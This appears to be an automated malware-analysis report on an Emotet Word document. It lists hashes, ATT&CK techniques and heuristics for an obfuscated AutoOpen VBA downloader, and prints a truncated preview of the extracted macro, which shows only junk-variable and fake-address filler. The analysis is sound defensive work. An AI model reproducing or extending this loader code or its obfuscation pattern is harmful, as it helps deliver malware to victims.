Emotet Office (OLE) malware analysis — malicious · 1b4067d2c7dca9c1

MALICIOUS

Office (OLE)

341.0 KB Created: 2019-10-10 06:27:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: fbbc2949f88305492dc808e9934e4fa0 SHA-1: 20fbb43d82081ea050e99eccbcd34c9650e27544 SHA-256: 1b4067d2c7dca9c165cd93ffc8214ac855dc28de689ffd14cc2e3e00190520a5

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, specifically an AutoOpen macro that uses CreateObject and execution tokens. ClamAV also identifies it as Doc.Downloader.Emotet-7331190-0. The VBA script, while heavily obfuscated with what appear to be junk comments and variable assignments, is structured to execute code via CreateObject, indicating it likely downloads and executes a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7331190-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7331190-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 74010 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	74010 bytes
SHA-256: `67758a9a0d209cd1852c94f42fa22685549b6ef3f313d0b31fe02797ab1e27cd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b389210350493" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "x6b460306c1, 0, 0, MSForms, TextBox" Attribute VB_Control = "b5c070100x025, 1, 1, MSForms, TextBox" Attribute VB_Control = "xc117391c90x, 2, 2, MSForms, TextBox" Attribute VB_Control = "x568076028c10, 3, 3, MSForms, TextBox" Attribute VB_Control = "x0675c0609058, 4, 4, MSForms, TextBox" Attribute VB_Control = "c61091060x28, 5, 5, MSForms, TextBox" Attribute VB_Name = "c0cb220c200x9" Function c839959690884() On Error Resume Next x86b06408c917 = False 'Dynamic0571 Berenice Street, Shanafort, Jersey Dynamic1487 Hauck Port, Caesarville, Ukraine xc54080b140 = Round(b054721b9381) x6ccc009xc0 = False 'International2876 Johathan Meadows, Lake Morgan, Solomon Islands Internal125 Rodolfo Circles, Murphyfurt, Swaziland x638cbx7893 = Round(b13001b607x) b570344cx6386 = True 'Future182 Willms Points, Jodybury, French Polynesia Dynamic93598 Doyle Mission, West Brandimouth, Jamaica b40060694c30 = Round(x02446708401) c0c2c5x6018 = True 'Chief40941 Nikolaus Wells, Veldafurt, Gabon National7427 Hessel Club, Mattieview, Slovakia (Slovak Republic) c10x83797x1 = Round(x6940381x4xx) b0cb96600041 = False 'Customer5156 Hilda Glen, West Audieside, Saint Barthelemy National2724 Osinski Mountains, East Johnson, Belize bb0017560323 = Round(c00xx0x05066x) cx96b706b0xcx = True 'Direct86253 Gerlach Inlet, Bruceview, Tajikistan Dynamic418 Purdy Turnpike, Goldnerborough, Tanzania c439b0b4cb688 = Round(c6290370b102) x70081bc3b0 = False 'Future45938 Angelita Course, Travonfurt, Belarus Internal643 Ricardo Turnpike, Lake Clementina, Pakistan b570378x602x = Round(b26283cc569) x6c10c8x35259 = True 'Chief43426 Bartoletti Viaduct, Port Emilemouth, Montserrat Corporate288 Faustino Highway, Port Lucy, Liechtenstein b980cx5000c = False 'International41850 Rogahn Plaza, Lake Glennieberg, El Salvador National0093 Skiles Extension, Cobybury, Botswana b0x130454830 = Round(x0100309000) c93509c834bc0 = False 'Global412 Reichert Lodge, Ethylview, Georgia Legacy55647 Weber Burgs, Justusmouth, Croatia xx3b30cb70cb6 = Round(x55c60x16c8) bc8c928968509 = True 'Principal90496 Phoebe Row, Smithberg, Micronesia Human9761 Hahn Garden, Millerhaven, Mali b877xc1889b0x = Round(c95c842x32x58) b0c2906x40c60 = False 'Principal86165 DuBuque Drive, Purdymouth, Montenegro Future226 Aron Mission, Port Adelle, Oman b80090360327 = Round(x97093199b03) b602790460x = False 'National484 Bernita Mission, New Antoinettemouth, Cuba Regional14903 Marquardt Keys, Barrowsmouth, Sweden x1052284b68 = Round(b90004b2c44) b6710053050 = True 'Global06461 Carmella Harbors, Lake Otisland, Botswana Dynamic83659 Kozey Isle, Port Ramonburgh, Latvia xx82x1052c58 = Round(x9c06520c000) c62c243b8031x = True 'International593 Hilll Valley, Lake Tessbury, Gabon District783 Buckridge Lodge, West Sophiamouth, Nigeria bc60c47971b = Round(c0324c90033) xb263406083 = False 'Regional378 Hansen River, Lake Einar, Saint Barthelemy Regional30339 White Ways, Roymouth, South Georgia and the South Sandwich Islands b0008097499x7 = True 'Investor5341 Gardner Views, Mariannaside, Peru Forward30649 Raynor Hills, New Aliastad, Papua New Guinea c4289x51624 = Round(c82b74100274) c125077000000 = True 'Chief029 Carter Camp, Stokesville, Spain National97814 Genevieve Neck, South Christ, Tajikistan x61618058516 = Round(x91x36x204000) x772179305xc = False 'Customer2173 Mohammed Spurs, Nathanbury, Uganda Human1581 Deangelo Forge, New Stephanie, Barbados x0bcc0c80546 = Round(c019cx5071114) b23280890002 = False 'National77434 Stokes Crest, North Davestad, Venezuela Forward9329 Wisoky Fields, Windlerberg, Chile x08707b13x0cc = Round(c05023cx230bx) b90c536840230 = True 'Lead398 Orlando Expressway, East Bill, Lao People's Democratic Republic Direct936 ... (truncated)

SHA-256: 67758a9a0d209cd1852c94f42fa22685549b6ef3f313d0b31fe02797ab1e27cd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b389210350493"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x6b460306c1, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b5c070100x025, 1, 1, MSForms, TextBox"
Attribute VB_Control = "xc117391c90x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x568076028c10, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x0675c0609058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c61091060x28, 5, 5, MSForms, TextBox"

Attribute VB_Name = "c0cb220c200x9"
Function c839959690884()
On Error Resume Next
   x86b06408c917 = False
'Dynamic0571 Berenice Street, Shanafort, Jersey Dynamic1487 Hauck Port, Caesarville, Ukraine
xc54080b140 = Round(b054721b9381)
x6ccc009xc0 = False
'International2876 Johathan Meadows, Lake Morgan, Solomon Islands Internal125 Rodolfo Circles, Murphyfurt, Swaziland
x638cbx7893 = Round(b13001b607x)
b570344cx6386 = True
'Future182 Willms Points, Jodybury, French Polynesia Dynamic93598 Doyle Mission, West Brandimouth, Jamaica
b40060694c30 = Round(x02446708401)
c0c2c5x6018 = True
'Chief40941 Nikolaus Wells, Veldafurt, Gabon National7427 Hessel Club, Mattieview, Slovakia (Slovak Republic)
c10x83797x1 = Round(x6940381x4xx)
b0cb96600041 = False
'Customer5156 Hilda Glen, West Audieside, Saint Barthelemy National2724 Osinski Mountains, East Johnson, Belize
bb0017560323 = Round(c00xx0x05066x)
cx96b706b0xcx = True
'Direct86253 Gerlach Inlet, Bruceview, Tajikistan Dynamic418 Purdy Turnpike, Goldnerborough, Tanzania
c439b0b4cb688 = Round(c6290370b102)
x70081bc3b0 = False
'Future45938 Angelita Course, Travonfurt, Belarus Internal643 Ricardo Turnpike, Lake Clementina, Pakistan
b570378x602x = Round(b26283cc569)
x6c10c8x35259 = True
'Chief43426 Bartoletti Viaduct, Port Emilemouth, Montserrat Corporate288 Faustino Highway, Port Lucy, Liechtenstein
b980cx5000c = False
'International41850 Rogahn Plaza, Lake Glennieberg, El Salvador National0093 Skiles Extension, Cobybury, Botswana
b0x130454830 = Round(x0100309000)
c93509c834bc0 = False
'Global412 Reichert Lodge, Ethylview, Georgia Legacy55647 Weber Burgs, Justusmouth, Croatia
xx3b30cb70cb6 = Round(x55c60x16c8)
bc8c928968509 = True
'Principal90496 Phoebe Row, Smithberg, Micronesia Human9761 Hahn Garden, Millerhaven, Mali
b877xc1889b0x = Round(c95c842x32x58)
b0c2906x40c60 = False
'Principal86165 DuBuque Drive, Purdymouth, Montenegro Future226 Aron Mission, Port Adelle, Oman
b80090360327 = Round(x97093199b03)
b602790460x = False
'National484 Bernita Mission, New Antoinettemouth, Cuba Regional14903 Marquardt Keys, Barrowsmouth, Sweden
x1052284b68 = Round(b90004b2c44)
b6710053050 = True
'Global06461 Carmella Harbors, Lake Otisland, Botswana Dynamic83659 Kozey Isle, Port Ramonburgh, Latvia
xx82x1052c58 = Round(x9c06520c000)
c62c243b8031x = True
'International593 Hilll Valley, Lake Tessbury, Gabon District783 Buckridge Lodge, West Sophiamouth, Nigeria
bc60c47971b = Round(c0324c90033)
xb263406083 = False
'Regional378 Hansen River, Lake Einar, Saint Barthelemy Regional30339 White Ways, Roymouth, South Georgia and the South Sandwich Islands
   b0008097499x7 = True
'Investor5341 Gardner Views, Mariannaside, Peru Forward30649 Raynor Hills, New Aliastad, Papua New Guinea
c4289x51624 = Round(c82b74100274)
c125077000000 = True
'Chief029 Carter Camp, Stokesville, Spain National97814 Genevieve Neck, South Christ, Tajikistan
x61618058516 = Round(x91x36x204000)
x772179305xc = False
'Customer2173 Mohammed Spurs, Nathanbury, Uganda Human1581 Deangelo Forge, New Stephanie, Barbados
x0bcc0c80546 = Round(c019cx5071114)
b23280890002 = False
'National77434 Stokes Crest, North Davestad, Venezuela Forward9329 Wisoky Fields, Windlerberg, Chile
x08707b13x0cc = Round(c05023cx230bx)
b90c536840230 = True
'Lead398 Orlando Expressway, East Bill, Lao People's Democratic Republic Direct936
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.